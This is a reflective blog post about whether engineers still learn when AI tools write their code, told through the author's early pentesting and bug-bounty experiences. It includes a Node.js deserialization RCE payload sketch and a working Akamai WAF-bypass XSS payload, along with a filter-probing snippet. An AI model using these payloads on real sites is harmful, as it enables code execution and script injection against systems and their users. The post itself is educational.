Learning in the age of AI

Posted on Dec 7, 2025

What does “learning” even mean in a world where AI can build, debug, and optimize code faster than we can open Stack Overflow? That question hit me recently—and it led me down a long path of reflection.

Over the past few months, I have been using AI tools in my day-to-day work: ChatGPT, Perplexity, Amazon Q, Cursor, and others.

A couple of weeks ago, I needed to build an automation using Python, so I decided to use Amazon Q for the task. I wrote down my requirements and entered them into Q’s chat panel. Within a couple of minutes, it had generated the entire script along with the required dependencies. All I had to do was run pip install -r requirements.txt and then python automation.py, and voilà, the automation worked exactly the way I wanted.

I decided to refine it further with security and optimization in mind. I prompted Q to make the improvements, and it updated the script almost instantly.

Feeling good about the progress, I shut down my system for the day. But as I stepped away, the reflective part of my brain kicked in. What had just happened? That one moment triggered a cascade of thoughts about learning, efficiency, and how AI is quietly reshaping how we work.

I’ve worked with Python before, but writing the same automation myself would have easily taken 5–6 days. With Amazon Q, I was able to complete it in just a couple of hours.

But even if I had decided to build it manually, it wouldn’t have been a movie-style moment where I simply pulled up the requirements and started typing away. It would have taken time to lay down the basic structure, go through trial and error, troubleshoot and debug endlessly, learn or revisit the libraries and dependencies I planned to use, read their documentation, and piece everything together step by step.

As those thoughts settled in, I started asking myself a few simple but important questions:

  1. Did I actually learn anything new? If I’m being honest, the answer was no.
  2. Did the job get done? That’s a clear yes.
  3. Could I have written the same code myself, with the same level of security and optimization? Maybe—but it would have taken much longer.

Out of all three, the first question lingered the most. I’ve always believed in staying a learner, no matter how much experience I gain, and in that moment I wasn’t entirely sure if I had lived up to that belief.

Throwback: How I Used to Learn

Before diving deeper into my reflections, I found myself thinking back to the early days of my infosec journey — back when I was still figuring things out and every problem felt like a puzzle waiting to be solved.

One piece of advice from a senior stuck with me: “Always try to find the solution yourself first. If you still can’t figure it out, then reach out to others.”

I’ve followed that approach ever since, and it shaped my entire learning philosophy. It taught me patience, curiosity, and the value of getting my hands dirty before looking for shortcuts.

HackTheBox: Celestial

Back in 2017–18, I spent a lot of time solving HackTheBox machines to sharpen my pentesting and red teaming skills. One of the machines I attempted was Celestial, which required exploiting a Node.js deserialization vulnerability. After researching the topic, I found a blog post explaining how to craft a payload for remote code execution, so I followed along and built the reverse shell and payload using the sample code provided.

When I sent the payload through Burp Suite, I kept hitting a Node.js syntax error. Since I wasn’t familiar with Node.js back then, the error didn’t make much sense to me.

I revisited the blog post, repeated the steps carefully, and made sure I hadn’t missed anything—but the same error kept coming back. So I put on my “learning hat” and started digging deeper. I Googled the error, jumped through multiple Stack Overflow threads, and followed different debugging paths until I finally discovered the issue: I was missing a closing curly brace } in my payload before serialization. That tiny mistake was breaking the entire payload.

Once I fixed it, I successfully exploited the machine.
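With hindsight, the failure is easy to reproduce. Here is a minimal sketch of how one missing brace breaks the whole payload; the node-serialize-style prefix, the command, and the parses() helper are illustrative assumptions, not my original exploit:

```javascript
// node-serialize marks serialized functions with the _$$ND_FUNC$$_ prefix;
// on unserialize it strips the prefix and effectively eval()s the remainder.
const PREFIX = '_$$ND_FUNC$$_';

// The same payload with and without the closing brace of the function body.
const broken = PREFIX + "function(){require('child_process').exec('id')()";  // '}' missing
const fixed  = PREFIX + "function(){require('child_process').exec('id')}()";

// Compile (but do not run) the function part, the way eval would parse it.
// new Function() throws a SyntaxError at construction time if the source
// doesn't parse, without ever executing the body.
function parses(payload) {
  try {
    new Function('return ' + payload.slice(PREFIX.length));
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

console.log(parses(broken)); // false: the SyntaxError I kept hitting
console.log(parses(fixed));  // true: parses once the brace is back
```

The trailing () is what makes the function run during unserialization in this class of exploit; with the brace missing, the payload never even parsed, which is why the error surfaced long before any code execution.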

Looking back, I realize just how much I learned from that single experience. Going down that rabbit hole of errors, Google searches, Stack Overflow threads, and trial-and-error debugging taught me far more than simply fixing a broken payload. I didn’t just solve the issue—I picked up pieces of Node.js syntax, serialization quirks, and debugging patterns that I had never been exposed to before.

If I had been using an AI tool back then, I probably would have solved the problem in just a few prompts. It would have given me the corrected payload, explained the syntax error, and I would’ve moved on. But in doing so, I would have missed the deeper learning—the kind that only comes from struggling with the problem, understanding why something is breaking, and slowly piecing together the underlying concepts. In this case, that struggle is exactly what taught me more about Node.js than I had ever known at the time.

Bug Hunting: Akamai XSS WAF Bypass

Around the same time, I was also actively involved in bug hunting. One particular target looked suspiciously vulnerable to XSS because my input was being reflected directly in the response. Naturally, I started with a simple payload: <script>prompt(1)</script>

Instead of triggering an alert, I got an error indicating that Akamai’s WAF was blocking my request, flagging it as an XSS attempt.

I tried a bunch of common payloads—nothing worked. So I took a step back and started analyzing exactly which characters were allowed and which were being blocked. For the next few days, I tested combinations, broke down payload structures, and slowly mapped out how the WAF was filtering requests.
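That mapping step boils down to a simple probe loop: replay a baseline request with one candidate character at a time and record which ones the WAF rejects. This is an illustrative reconstruction, not my original tooling; the probe set is arbitrary, and wafBlocks() is an offline stand-in for sending the request and checking for the block response:

```javascript
// Characters worth probing for an XSS context.
const PROBES = ['<', '>', '(', ')', '`', "'", '"', '=', '/'];

// Stand-in for "send the request, check whether the WAF rejected it".
// Toy rule set for this sketch: parentheses and double quotes are blocked.
function wafBlocks(char) {
  return ['(', ')', '"'].includes(char);
}

// Split the probe set into what the filter allows and what it blocks.
function mapFilter(probes, isBlocked) {
  const allowed = [], blocked = [];
  for (const ch of probes) (isBlocked(ch) ? blocked : allowed).push(ch);
  return { allowed, blocked };
}

const result = mapFilter(PROBES, wafBlocks);
console.log('allowed:', result.allowed);
console.log('blocked:', result.blocked);
```

In practice the stand-in is a real HTTP request, and the block signal is whatever the WAF returns when it intervenes. The payoff is knowing, for example, that parentheses are filtered but backticks are not, which is exactly what points you toward tricks like tagged-template function calls.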

After about five days of trial and error, I finally landed on a working payload: <marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>

I reported the finding, and although it turned out to be a duplicate, it was still validated as a genuine XSS bypass for Akamai and later made its way into the Awesome WAF list.

Looking back, I often wonder how different that process would have been in today’s age of AI. If I had access to ChatGPT or any security-focused AI tool, I could have generated dozens of bypass attempts in minutes. It would’ve saved me days of manual work—but it also would’ve cost me the deeper understanding I gained by grinding through research papers, XSS blogs, WAF bypass techniques, and hands-on experimentation.

Relearning How to Learn in the Age of AI

Coming back to the present, I want to be clear: I’m not against using AI tools for building or troubleshooting. In fact, I believe we should use them—actively and effectively. They help us move faster, explore more ideas, and focus on higher-level thinking, all while keeping security and optimization in mind.

But at the same time, we need to make sure we’re actually learning from them, not just using them as a shortcut. AI can accelerate the work, but it can’t replace the depth of understanding that comes from engaging with the problem yourself.

Over time, I’ve adopted a few practices to make sure I’m getting the most out of AI tools while still growing as an engineer:

  • Review the code that AI generates: When I use AI tools to build something new, I go through the generated code to understand what it does and whether there’s something new I can learn.

  • Ask follow-up questions: When something isn’t clear, I ask Amazon Q or Cursor to explain the code in more detail.

  • Evaluate changes carefully: When I prompt for changes or tweaks to the code, I review the updated version to understand what was done and, if needed, ask follow-up questions.

  • Inspect dependencies and functions: I review the dependencies being used and the functions being called, and I may read their documentation or ask the tool to summarize them.

  • Verify line numbers and references: Code-generation tools often misalign line numbers or point to lines that don’t exist. This is a known issue, so I always double-check those. For reference, see #505, #271005, and AI LLMs can’t count lines in a file.

  • Prioritize security: As a security enthusiast, I make sure to prompt tools to use the latest dependency versions and follow secure coding practices. Read Why Your AI Code Assistant Might Be Shipping CVEs, Security-Focused Guide for AI Code Assistant Instructions, and Free AI Coding Security Rules.

  • Read the full troubleshooting analysis: When using AI to debug issues, I don’t just copy-paste the solution. I read the reasoning to understand what went wrong and how the fix works.


AI helps me get work done in minutes, but the lessons that stay with me still come from the messy parts—debugging, experimenting, failing, and trying again. As we move deeper into the age of AI, I’m learning to balance both speed and understanding. One helps me deliver; the other helps me grow.

If you have your own thoughts or experiences about learning in the age of AI, I’d love to hear from you. Feel free to reach out or connect with me on LinkedIn.